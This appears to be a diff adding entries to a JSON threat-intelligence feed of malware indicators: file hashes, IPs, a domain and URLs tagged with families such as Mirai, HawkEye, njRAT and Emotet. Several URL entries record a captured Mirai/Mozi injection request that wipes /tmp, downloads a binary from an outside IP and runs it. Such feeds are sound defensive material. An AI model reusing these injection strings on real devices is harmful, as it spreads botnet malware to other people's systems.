+ "seqUpdate": 17274452953530,
+ "hash": [
+ "916f1814bc272920b1b48ab3afebe9b4",
+ "effe0df21308811974a452fe909b987a16ce5f02",
+ "83e1b784d6f73136eb09ee432ce95cd0997b52e99dae1cffc691872088b90ca1"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "af6f749d6de0a49db902e8832633c175514da89e",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274464058830,
+ "hash": [
+ "6b7943d9dcaec5290770f5b9bafb9df1",
+ "f1ec547493bd743a35c343a8f2ada2b3fbcd66bc",
+ "d7b8fde8d95721b5fdbc1b71aebd5ff05e4059394b2ef1f4cb59127f2097b819"
+ ],
+ "malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "93f69e2ea77b08535676aaeecb5898bafda05685",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274479768617,
+ "hash": [
+ "22d670db0c5241a61a2bbf8ed97ea9ce",
+ "f1f6ee8cd17f571034497edb4aadf9056f10a3e6",
+ "8faaed349c4b8f0089699f4ba70b1626076c60eff0729024a0e9a7cd37dbf178"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "16e715c5370eec16819ae7e3595f564d498cdc1f",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "url": "https://185.186.92.178:80/shell?cd+/tmp;rm+-rf+*;wget+http://59.89.181.216:42895/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws",
+ "seqUpdate": 17274485841403,
+ "ip": [
+ "185.186.92.178"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "f7bb4d448338499521a85fa3d8b61691e02d2af0",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "url":
"http://185.186.92.178/shell?cd+/tmp;rm+-rf+*;wget+http:/59.89.181.216:42895/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws",
+ "seqUpdate": 17274485842176,
+ "ip": [
+ "185.186.92.178"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "24196937e7a8ff9bcddd8bf9002499f6cf3c41d0",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274485843549,
+ "ip": [
+ "59.89.181.216"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "fac227fec61059014d42490f9c2f7b96b7eff760",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274486950887,
+ "hash": [
+ "b31f3b0b34fe8887b883bc3f60024c1b",
+ "f6a0a82eacff624ed413ddfea851ff099f3e6c36",
+ "d838314c9fcf6f437fe797689c3e54efc988b0257038667c033eba1b3b8105af"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "fb7cefcbe9fc3be873c1f9227da7b0af761d3059",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274494000933,
+ "hash": [
+ "dc807112ced19dedb2b6370050de9692",
+ "f6cc899591d8879980e72001866a0c1ec31cb546",
+ "f161a087134b71508661985900682407f94e08ce9b988f5ec7a19c730ca477a8"
+ ],
+ "malwareList": [
+ {
+ "name": "Coinminer",
+ "aliases": [
+ "BitCoinMiner",
+ "BitMiner"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "364f329901072fb2a780734e81561afbb1c4ae55",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274515040470,
+ "hash": [
+ "46f71c361c9143301b96c59c14590851",
+ "fb9bb002db369c33d7f1a103d9c40bed061206fc",
+ "28b0617ea41fcc6b9aea6811aa62dccd7b8bd6de65c7194e68c16d32a553eb6e"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+
],
+ "threatList": null
+ },
+ {
+ "id": "63d9cf4c3ea730b02a88933c06ae3f7c7551396d",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-10-19T00:00:00+03:00",
+ "url": "http://192.188.248.134/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws",
+ "seqUpdate": 17274522225834,
+ "ip": [
+ "192.188.248.134"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "606d36d1bb1303ed06bd33ae6794d3ac86dabaf9",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274522226434,
+ "ip": [
+ "120.86.239.213"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "a2ec7caa31d1f56b6cc02764b1becd6f2cf14a32",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274524655857,
+ "hash": [
+ "06b3af3b4ea9f86a7e782f32904f0d3c",
+ "fb2ff0edc593e84b186dd9dd8a2e04dd6f47a78f",
+ "89082b01e6f6ab6dc69175b1216277ed7fd6d57d4791386fc445214e706c1d14"
+ ],
+ "malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "7c38c9ce204face2af7c193c0f546e109c906086",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-10-03T00:00:00+03:00",
+ "seqUpdate": 17274534252389,
+ "ip": [
+ "157.173.104.92"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "eaaf0863d5056aff4b8aaeb54ac68608ead0d718",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274535353153,
+ "hash": [
+ "c1bcd150e3e7e4a2d456a0d04d05f95b",
+ "fe76df9a0c55d9c7dc9d77299a785448bd9ad21c",
+ "bea80492aaf96600279ba18fbd7f42e2fa1b59afc29745d1d3258649757dee20"
+ ],
+
"malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "4be19bf146b6f120b7cd96765c2d9a2e0e5d186e",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274543912402,
+ "hash": [
+ "ffb4062b8c94ba74ea6778098a0b0147",
+ "07f96525c1f1ed94715a42488453f9c1cee7eff1",
+ "9edd1622b9cf1b2340f4a6605e26ebd0f996f97074c418bd15a4a9d457713898"
+ ],
+ "malwareList": [
+ {
+ "name": "njRAT",
+ "aliases": [
+ "Bladabindi",
+ "Ratenjay"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "d9cb3f50723300775bccbac6b0322f44d8bfcd56",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274556048659,
+ "hash": [
+ "79cb67d91b61383c67ae058f933995b6",
+ "1d211f00d1bf0a9ed75e8eb342368f3a73e0d3e4",
+ "25c2eb2304075061c1291cedd4bc150640c3ff7ea8133d4ca2c2abd5b38b92d2"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "99765b20af5a0dfea9433be1bad299564e7d5567",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274557554591,
+ "hash": [
+ "991075dd7f0e60080f049fced9ea01e8",
+ "13f7f687922a96fb59e83e466d40f77cfc3a5992",
+ "5ff2541be1187a87513dc6ee33f74b5d97bb91500deba2fa3a24600c09647eb3"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "080c45e15abc85506803b0b534d0c8763d326312",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274558517695,
+ "hash": [
+ "0959e07315a3cdea9ebfeceebcb64580",
+ "fb2fd9609568a5173b9d58637449483fce90dd3c",
+ "3b9d6ed3864f72ac5bfc16c1f42fb36018c8a74b113c0b879f4122ee6f788cd2"
+ ],
+ "malwareList": [
+ {
+ "name": "NetWire",
+ "aliases": [
+ "NetWiredRC"
+ ]
+ }
+ ],
+ "threatList":
null
+ },
+ {
+ "id": "35f0fd7fd26e212ec8d9e07d091c9f675225da8d",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274558520816,
+ "hash": [
+ "9b873afa3111bab0dcf46b9ceea91937",
+ "fb81cab156db106498b909ff8b362be757af4df8",
+ "a0300f9c01c52e05c18e9209748718cc77697d76f411155a9812d7e97937f05b"
+ ],
+ "malwareList": [
+ {
+ "name": "NetWire",
+ "aliases": [
+ "NetWiredRC"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "f3e6a58b8745ebea2aa90379988e773824d4bb4c",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274559188265,
+ "hash": [
+ "308def1e38b21f94e069bee9f415dd43",
+ "8401f0d96d42c2fc786b88eaeb05cafd2777abe5",
+ "af4d4686f55036da13704b5ce46fde446bb9dde60b9c66b3af13daa106211b1a"
+ ],
+ "malwareList": [
+ {
+ "name": "Smoke Bot",
+ "aliases": [
+ "Sharik",
+ "Dofoil",
+ "Smoke Loader"
+ ]
+ },
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "edfb8bbb918907f2f6ebc87fdf5c8a8ab46a267c",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274559192152,
+ "hash": [
+ "76c9a6535828cc91fa41b8468a3f1578",
+ "7cc14b0c5846be808647b363da608c4db2a0740d",
+ "d8944970d80375267cc3c3dbcd69855807ca9f1e101cd14b321321a795d0339c"
+ ],
+ "malwareList": [
+ {
+ "name": "Smoke Bot",
+ "aliases": [
+ "Sharik",
+ "Dofoil",
+ "Smoke Loader"
+ ]
+ },
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "83c54e8e2a91ec293ab3d40e1f774fb103069b69",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274565535559,
+ "ip": [
+ "139.162.132.120"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "bc416b7f9d52c9add23614252d0ce75469f3598a",
+ "type":
"file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274570530356,
+ "hash": [
+ "ed1b4fe03fcbae4439b5f0e4a85b8178",
+ "1148d83279b0c558f95e55bc2ff51cd32f2420d8",
+ "8d13f2de011a85ae5352f782a8170f4ea99ecb59ee2cdd8f47942f4321998f4d"
+ ],
+ "malwareList": [
+ {
+ "name": "Coinminer",
+ "aliases": [
+ "BitCoinMiner",
+ "BitMiner"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "5dce64781cc69f12726031651620e13fe7542d06",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274570533559,
+ "hash": [
+ "cf166ac5a4b2e4fd3d9fe2d736d1c9c3",
+ "20dad98a2c9658e77f199f5cfaa155c767819603",
+ "cf50e86257c005936b7cbf1628a85b85b313e90a2e59bab04a6c53c22785dd27"
+ ],
+ "malwareList": [
+ {
+ "name": "Coinminer",
+ "aliases": [
+ "BitCoinMiner",
+ "BitMiner"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "dce63df66d9aafefee75a7f9de12c1b74b32b013",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274570537186,
+ "hash": [
+ "c3c2a0dd0abc9b2ac552789d38b87ce1",
+ "262ed236dfb84bd1701031e2bf3d1cfd34ffbc54",
+ "9cc267108819c49fa1814955f6f93a451016f5d6c35bc3c90d30ce446be0f9c3"
+ ],
+ "malwareList": [
+ {
+ "name": "Coinminer",
+ "aliases": [
+ "BitCoinMiner",
+ "BitMiner"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "9171356831031ba15736f161d0103d3a6836dfd7",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274570540692,
+ "hash": [
+ "d5df7ec794b00a9758287c57beabe2d8",
+ "295faed809dd51d5955e5fe42d4665914ea15324",
+ "aa49190832a29956065fd891219cbe2555c82bcd53338848591c94e18598f1c7"
+ ],
+ "malwareList": [
+ {
+ "name": "Coinminer",
+ "aliases": [
+ "BitCoinMiner",
+ "BitMiner"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "939d51d56e697f29afef79eee28d7dfeb14947c1",
+
"type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274570543703,
+ "hash": [
+ "32008d0fb6fe816dabfd0775f603a1e6",
+ "2a574124ee0039ca6dcc865e525a5fa448512eee",
+ "9f9a61aac70b6fedb23904cba692fabf8d465ca784c0317057ea7fcb575c90e8"
+ ],
+ "malwareList": [
+ {
+ "name": "Coinminer",
+ "aliases": [
+ "BitCoinMiner",
+ "BitMiner"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "729e33aecc7ea6a9814a9667bb5ad25cc917ff34",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274573337462,
+ "hash": [
+ "c1ad74d38d57d2403ee3afb74d8a41bb",
+ "19b02cdea5e944db5216d2a35f236afa77e934bf",
+ "c99d5e18e37cce5f6af1ae50fc29b3815f6b07e24c73822d66daa9f9ad249656"
+ ],
+ "malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "c8f69f2e46521ef2591fcdf0bd107171e5a0ed97",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274573341640,
+ "hash": [
+ "e791f3600b7dcb470c11dc8edf6924cc",
+ "1a0ab24842d8626670841f12b676ebd7b0f133bf",
+ "3ee64f7e26d57505d85fb580d0864cce15fa455043999a4498a7665c34b094a8"
+ ],
+ "malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "b2274c704605c1138c2515501c8d143cc72bfa10",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274586464093,
+ "hash": [
+ "009855d959f187061bcc2b6343bcc20c",
+ "359f818868a08eaa10c0476c8506cb92aa19418e",
+ "a8d6a1f3e9d77030c4f2b3ab44619862123d90027100315691a74bf7ce33c332"
+ ],
+ "malwareList": [
+ {
+ "name": "Silence.ProxyBot",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "f20f425662cfa1ca082a949ffc54b0bfa1e01f6d",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274588693486,
+ "hash": [
+ "b1e932fb59a5718652da0ed6319ffb2b",
+ "43c21b5cc5b34842cd39e4b43a9cbe04ccca82dd",
+ "6b9d84368a7f6100e45ff023be91838598cfba5a9dab35e7db3be595f2c82bf4"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "c3edbd45969d9368b51ada453ba651d12fef5320",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "domain": "sxm.carrental.okaseo.com",
+ "seqUpdate": 17274588887356,
+ "malwareList": [
+ {
+ "name": "Emotet",
+ "aliases": [
+ "Emotet",
+ "Geodo"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "ea435f96d05f31d257dc3ec569b872966d476085",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274595244072,
+ "hash": [
+ "3a7442785c895ddd05b6dfd53fa113c6",
+ "568f040b81a5c770557dc887f9c43b705f2aaa9b",
+ "656d548fe93ed11521dc0ab00ab2139655c52636aa767c824638c8c44d5b5366"
+ ],
+ "malwareList": [
+ {
+ "name": "Locky",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "d43c8a096f0f2f705ac7cc7ee98bd32a814cb71f",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274597178873,
+ "hash": [
+ "67016a1b7e40ff82cc277fa0240e9cc9",
+ "484a30ace28810a4735a9a5649933a3b4d19ad5d",
+ "2fca3e7e31e3105f822a618e52f48429d332a1a2721b58ce9cd350a194d407ae"
+ ],
+ "malwareList": [
+ {
+ "name": "BackSwap",
+ "aliases": []
+ },
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "1fe592c5915f18535ffad92b1e6c89454b56050d",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274597314972,
+ "hash": [
+ "af1b7a6904a1bced92089c7fd45f13b0",
+ "0161638df8519595663d4956f09d38a504ba9692",
+
"d33e9ef79b8c61d4c66589a6be6415b5df29f36495dbb24bda2e499d92de6eac" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4bd61d3804702b3287743c631259328ed3dfbd6d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274598557591, + "hash": [ + "27e18be58849bfc3ab8488d9ec4099a8", + "526f423094d650c057636c6747d8255e394c4263", + "c98edac896896ad536923fc022f19b5bbe35bb477a209312090953174683dceb" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "d7c0a40a9f61a5f7d930f8f330cf2bcb9993ba93", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274599405665, + "hash": [ + "bce2d7723f8c3fb9e85df932a39e8f9c", + "5e135ccc0809ba0e625b8345366b74a7f0a77742", + "c2d44fcb0eaefe9a5020d1f9b14d8e0293f16fe5ca6f97299499c67185fa0538" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4d67125c95738488e0bcae38d9cbfea092cf1ed9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274601344307, + "hash": [ + "9a8af0801e886bf24d43f708be27f5b1", + "4c57e069de8bb743beffee106a0b5aed7479443f", + "8f00c7bbb7c2f109035b055a8d1797eff0153bf052901b51c95259cbf351b6be" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "baeb867c3475cbf138956248403cadd5885071fa", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274620040105, + "hash": [ + "0e4c248dd136ff4d2b04613df918960d", + "6a08f2bc8c0fc7a3da9c69c2cbb12d44858543ec", + "a3bd5d0f0762dc9d54517e4f7e100bad6ace415a204258d73d42a728cd52e446" + ], + "malwareList": [ + { + 
"name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "67777845142b854838df8fe3eb55669e48e56ac4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274622688466, + "hash": [ + "4ae9025afb6749d9edc7d73125575412", + "5f43ef474a05584d1b0cb35656cca0fc52e610c5", + "62b5b0fb4c78494149a36c38f7d667df6d7440334f65fb92e1196e62d336e8e7" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "13e254f03f4ee2ea2fce928e66019b8fd091dbdc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628049456, + "hash": [ + "dfabaf787bb82c68b5789e7da105c037", + "e5543a0ab3d37f27ae22a72c1ffe3e54db6e9f78", + "fad32ae5e109b0550b2912c91bed3f94975e1e1a4a8ba21214a405ddc6239d37" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "5e4dfa5f52d9dda5a368c5814e4de62788eae8c6", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628053171, + "hash": [ + "993da97a4d3f3c70b6a76640581cc3ef", + "e5e0ec29c58399a9e85018d63984d88a7da70309", + "f8d98171a6b845b37a7efe2d56d9b16f44b01e83e9078ad879e26620e79d9d8e" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "64e49c7724841df08715280c4d29253d243daeb8", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628056291, + "hash": [ + "5e192d59450f5ada7ea858703dc1e443", + "e7bce2793d8663d7beee0fcc9810c91c6a46f6d2", + "4fe96ee37f0c28cdb4831b4c984a3724f8519e9af7fd3558f70f3b446aa66936" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ca6aac48432fdb66bd482dd8a0fbbadd1fad03a0", + "type": 
"file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628059816, + "hash": [ + "7521b09ebd27f2fdc3b896fef4f357de", + "ee7bb15a82af7f3dd0707b18a022994a955f524b", + "58c37fb2ed0022929bf9ae357cf019014c826163bb38b7a3586c5c4bcb920d14" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "f64ac32ab2820a2008bbae6b49bc9cb81c4d1586", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628063283, + "hash": [ + "b9e53aadb23d12809ff91c2618c4ed85", + "fb74e22ee85ae72c0ca2e06f885db8ab6150e267", + "580e3d5c0f563e2248898a64df44c77488b7b2852e52c231350a25278a071b8d" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "09afb4ad2a14d2efc1a6685115bf1f3293a965e5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628065808, + "hash": [ + "94d95608ccbf21b51b07b706d57fc8e5", + "fc8c18172fc11cbaa5c58e497bd38d6d77b4a500", + "703653d5667d0936f2842f7dac7be8c3e5e7ac962b743238c0a4f6e54d6589f3" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ff7ce33dc382ee561cfb56ac5f9b02090e523029", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628068779, + "hash": [ + "d49d899db62c8d40771401becdc0a0bb", + "ffd6acd61a8b8147cff99d1f006b3190b57a7d6a", + "610355bd033fcd5718a4b56d5a95d245d4c58f6e25443e31436b4677fd7dad44" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "1bb9a5d2e713a2aed282e27de6524911afb9d5f6", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628071745, + "hash": [ + 
"23dec0df10a1481d1375661487adc67e", + "25bb46d226395c724b6b9c55f543a596fc4abc36", + "0b211557967e97830c0b7f78c76dd334c795b6aaf539f09d98795b4ae92f57c3" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3bb9d62cffc2fd66a8e484039ef392759fa8818a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628311035, + "hash": [ + "cfdffe2979dc245ab90200af8d359314", + "27f8881574c529f202ba73afe7fb9e9db75ffe2e", + "65bfdba87dacbda214336deab9153bba0b4c415ef67bc26de5f27a48784c5e22" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e75cdb59069374ef816b62e10c30a2e969ac06d4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628314734, + "hash": [ + "045ca76f58da12b443e69d5ca25b1f98", + "428e3a4014b7236cddecbd0359f8928561c79e8d", + "6e72bcc32404e35d254aef579dcfc2847e1ae87c8d93303742cbb12044c3a7bb" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3c57c8bf197ca7961216128319dc051bd1bd4f28", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628318414, + "hash": [ + "bd47733330552355e41a2d1710d291c2", + "558972857449c6a61e7d0588d5348a3d8a71d67a", + "28b14dee93a3f8f14613778418d6ab0eaf2ae8edb12fbd231d6b694331ee8121" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ab0eec09fbafdc3a301ab7460c8af656c15237d2", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628321743, + "hash": [ + "9d0a82c33ff52168c40c357dc59aaca5", + "56d2692ec047a0341e612af0eaab8ec5df31a27b", + "0b0218bd394c6d8ce3b028e6e367a3398f1ed814831664ceffa5b5dd036bd112" + ], + 
